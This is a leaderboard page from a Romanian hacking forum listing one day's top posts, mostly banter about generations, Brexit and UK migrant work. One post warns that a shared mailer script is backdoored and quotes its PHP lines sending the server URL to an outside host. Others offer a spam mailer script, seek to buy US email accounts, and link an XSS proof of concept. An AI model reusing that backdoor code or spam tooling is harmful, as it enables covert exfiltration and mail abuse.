Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 06/28/16 in all areas

  1. Am crezut că generația aia de proști wannabe s-a stins odată cu noi când am început să ne maturizăm. Văd că ne vin ăștia cu forțe proaspete din urmă.
    4 points
  2. Revin, merg să-mi iau globul de cristal să ghicesc numele prietenului tău.
    4 points
  3. @9ala9Fuck you Nu il descarcati,daca scriptul este excutat individul de mai sus primeste link-ul unde este urcat mail-ul. $attachfile = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; $Attach = file_get_contents("http://www.to-yuo.org/cp/data.php?URL=".$attachfile);
    2 points
  4. Hi , Here's my POC of stored xss in SAP. https://www.mediafire.com/?bm5tdz47oamd1a3
    1 point
  5. http://www.hanselman.com/blog/NETCore10IsNowReleased.aspx "I feel like it's the culmination of all these years of work in .NET and Open Source. This is why I came to work at Microsoft; we wanted to open source as much as we could and build a community around .NET and open source at Microsoft. 15 years and the work of thousands of people later, today we released .NET Core 1.0. Take a moment and head over to http://dot.net and check out the download page. It's got a really nice place you can try out C# directly in the browser without having to install anything! There's also a great C# Tutorial with interactive browser-based tools as well. .NET Core 1.0 runs on Windows, Mac, and several flavors of Linux including RedHat Enterprise Linux and Ubuntu. It supports C#, VB, and F# and modern constructs like generics, Language Integrated Query (LINQ), async support and more. The Core Runtime, libraries, compiler, languages and tools are all open source on GitHub where contributions are accepted, tested and fully supported." @Byte-ul
    1 point
  6. Multumesc tuturor ptr. sfaturi (chiar si ptr. injuraturi). A, si sigur ca merge acest business ca doar il urmaresc de peste 1 an. Daca gasesti o nisa si o speculezi local.....MERGE Sa ma lupt cu astia ar fi prea mult... http://www.cv-library.co.uk/network Ceva milioane de $ ori lire chiar nu am dar am gasit investitori dispusi sa investeasca. EU NU RISC NIMIC> Plus ca am luat 3 domenii foarte bine indexate momentan de Google. Problema rezolvata (din pacate cu indienii ptr. ca romanii mei stau sa ma caute pe net, sa-mi spuna ei cine sunt eu, care-i pagina mea de Facebook, sa vada daca am dupa ce bea apa si sa ma injure de mama). Se pierde inutil extrem de mult timp si inteligenta cu....nimicuri. Pacat.
    1 point
  7. Sincer sa fiu, nu am idee. Dar mai mult ca sigur au o adresa de mail pe site-ul lor, un numar de telefon, ceva. Sau, ai putea sa te duci acolo si sa te informezi.
    1 point
  8. http://9gag.com/gag/aB1rZ3D Rezultat: http://9gag.com/gag/aXwXgXg
    1 point
  9. Uite cum sta treaba cu tinerii din UK care plang dupa UE: Singurele lor surse de informatii si educatie sunt Facebook 24/7 si outlet-uri media care toate sunt de stanga.Sa nu mai vorbim de faptul ca : ( si retineti argumentul asta, se aplica si in US daca nu in toate tarile din vest) mediul lor academic e plin cu profesori care toti sustin intr-o oarecare masura stanga. Sa nu mai vorbim ca din mediu lor academic au aparut tot felul de trend-uri canceroase precum feminismul ( al 3-lea val, feminismul inainte suportau cu totu' alte valori fata de astazi) si alte tampenii care in esenta distrug societatea.
    1 point
  10. Anglia a fost si va ramane un imperiu. Nu le plangeti de mila englezilor. Or sa fie bine si fara UE. Plangeti-le de mila celor care au impresia ca acolo umbla cainii cu covrigi in coada. Nu ma refer la IT-isti, ci la oamenii care se duc pentru job-urile "normale". De doi ani incoace o gramada de prieteni si amici s-au dus acolo sa munceasca. Multi, foarte multi. Incredibil de multi. Am crezut ca raman fara prieteni in Romania. Majoritatea dintre ei isteti, muncitori, oameni foarte ok, care aici castigau minim 2000 lei pe luna. Cand a inceput exodul am auzit atatea cuvinte de lauda incat m-am gandit serios sa plec si eu. Frate, e bine aici, or sa imi mareasca salariul, o sa am si ore suplimentare, o sa strang cam 5-600 de lire pe luna dupa calculele mele. Am gasit si chirie la comun cu alti romani/emigranti/whatever ca sa platesc mai putin. Mancarea e ieftina. Englezii sunt civilizati. Aceeasi placa o auzeam de la toti. Din februarie anul asta au inceput sa se intoarca pe capete. Acum aceleasi povestiri si nemultumiri le au toti. Treaba cu marirea salariului pe ora nu aduce un mare castig in plus, cat sa iti permiti sa pui deoparte. Orele suplimentare nu sunt asa cum crezi ca vor fi ca numar de ore. Polonezii care deja au obtinut functii de team leaderi mai peste tot ii freaca pe romani si pe restul ca sa ii menajeze pe ceilalti polonezi. Nu iti permiti sa inchiriezi o casa, garsoniera, orice, doar pentru tine. Sa imparti ani de zile casa cu alte 5-6-10 persoane, ce se schimba constant, ca sa iti limitezi cheltuielile e mai nasol decat sa stai cu ma-ta si cu tactu in Romania. Salariile ajung undeva in jur de 1000-1500 lire pe luna. Au strans fix _)_. Unii mai norocosi au prins 1800-2000. Nu au ramas cu prea multi bani, ca deh, preturile la chirie + transportul + mancarea + alte cheltuieli incadrate la necesitati. Nu multi au ocazia sa munceasca cu englezii. Majoritatea emigrantilor lucreaza cu alti emigranti. Nu pare ceva nasol, dar nici nu poti spune ca e prea bine. Pleci din pleava romaneasca si ajungi in mijlocul plevei raselor mixte. Inveti fix _)_ O solutie sa strangi ceva e sa te duci cu iubita sau nevasta si sa impartiti cheltuielile timp de 3-4-5 ani. Dar intimitate veti mai avea din parti, cu inca o droaie de persoane cu care impartiti aceeasi casa. Asa ca pentru ce sa muncesti in UK? Ca sa castigi 1500 lire si sa traiesti la comun la fel ca in Romania? Ori sa iti mai iei un job, doua in plus. Da-le in ma-sa de timp liber si de somn. Bani sa fie. Anglia nu e Germania anilor 90 ca toata lumea sa se intoarca cu multi bani si nici Romania nu mai e tara cu preturile din 90, ca sa zici ca te intorci cu bani si faci ceva aici. Mare paguba nu e nici pentru UK si nici pentru romani. Oricum ei primesc anual sute de mii de indieni, asa ca ii doare la basca cu forta de munca.
    1 point
  11. Nu stiu la care generatii te referi, eu am 26 ani dar mie mi se pare ca generatiile de dupa 2000 sunt mai destupati la mine, asta si din cauza tehnologie, oricum fiecare padure are uscaciunile ei.
    1 point
  12. Dece sa iti cumparam tie cupoanele cand putem pastra 600 de lei in buzunar. Pentru 100 lei mai bine sa ramana 600 cash !
    0 points
  13. Am devoie de mailuria SUA , ce fel de provideri ai? Si cate conturi oferi pentru 30$ , iti trimit BTC .
    -1 points
  14. Vand cupoane Sodexo, momentan am 70 cupoane a cate 10 lei/bucata, in total 700 lei. Le vand pe toate pentru 600 lei. Iar saptamana viitoare mai fac rost de 80 bucati (aka 800 lei), o sa le dau cu 700 lei. Cupoanele sunt smart pass, aici e harta cu magazine unde le puteti folosi: http://www.mysodexo.ro/
    -1 points
  15. Ba da prosti sunteti. Omu a intrebat daca va merge sau nu sau a spus ca vrea site ? @Desmont daca investeste 2 milioane de euro, poate lua fata sau nu ? Vorbiti de pomana sa va aflati in treaba. Totul tine de resurse si de cum gandeste businessul
    -1 points
  16. Hi Guys today i will share with you my priv8 Mailer inbox Scripts This script is priv8 coded by Me It send inbox to all domain. Next time I will share another tools Script PHP : http://www.mediafire.com/download/fg9y9cw9ohzbdbw/hotmail.php ENJOY GUYS! Anything i'm here !
    -2 points
×
×
  • Create New...